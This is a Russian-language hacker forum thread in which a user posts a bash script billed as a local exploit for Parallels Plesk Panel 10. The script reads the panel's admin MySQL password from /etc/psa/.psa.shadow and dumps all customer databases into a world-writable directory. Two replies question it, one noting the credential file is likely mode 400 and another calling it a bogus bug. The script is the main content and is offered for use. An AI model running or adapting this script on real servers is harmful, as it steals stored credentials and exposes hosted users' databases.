Старый 10.06.2013, 10:32   #1
mehdi racha
 
Регистрация: 09.11.2012
Сообщений: 12
Репутация: 0
Arrow Parallels Plesk Panel => Linux local MySQL backup generate exploit

Parallels Plesk Panel => Linux local MySQL backup generate exploit
PHP код:
#!/bin/bash

# Title:    Parallels Plesk Panel => Linux local MySQL backup generate exploit
# Version:  10.0 and possibly below and higher
# Vendor :  http://www.parallels.com/
# About  :  Parallels Plesk Panel is the preferred choice for hosting service providers,
#           web designers, and website owners.
# Author:   Cold z3ro
# Web:      http://www.hackteach.org
# Exploit : attacker could infiltrate/intrusion to make MySQL database backup, also access to old backups taken before.


# dumpdir automatically generated when install pleask with 0777. 
dumpdir='/var/dbdumps/'
date=$(/bin/date +%HHours%m-%d-%Y)
mkdir -p $dumpdir$date
echo "Creating MySQL backup in $dumpdir$date .."

for i in `mysql -u admin -p$(cat /etc/psa/.psa.shadow) -Ns -e "show databases" | egrep -v "^(psa|mysql|horde|information_schema|phpmyadmin.*)"`; do
     
mysqldump --opt $i $dumpdir$date/$i.sql;
    echo 
"Created: $i.sql"
done
echo "Backups located in $dumpdir$date"
# fetching the database's
ls -1 $dumpdir$date 
mehdi racha вне форума   Ответить с цитированием
Старый 10.06.2013, 15:32   #2
12309
 
Регистрация: 25.12.2011
Сообщений: 265
Репутация: 33
По умолчанию

разве на /etc/psa/.psa.shadow не чмод 400?
12309 вне форума   Ответить с цитированием
Старый 10.06.2013, 17:22   #3
vp$
 
Аватар для vp$
 
Регистрация: 13.07.2010
Сообщений: 70
Репутация: 8
По умолчанию

очередная бредобага под плеск, сезон чтоли начался
vp$ вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot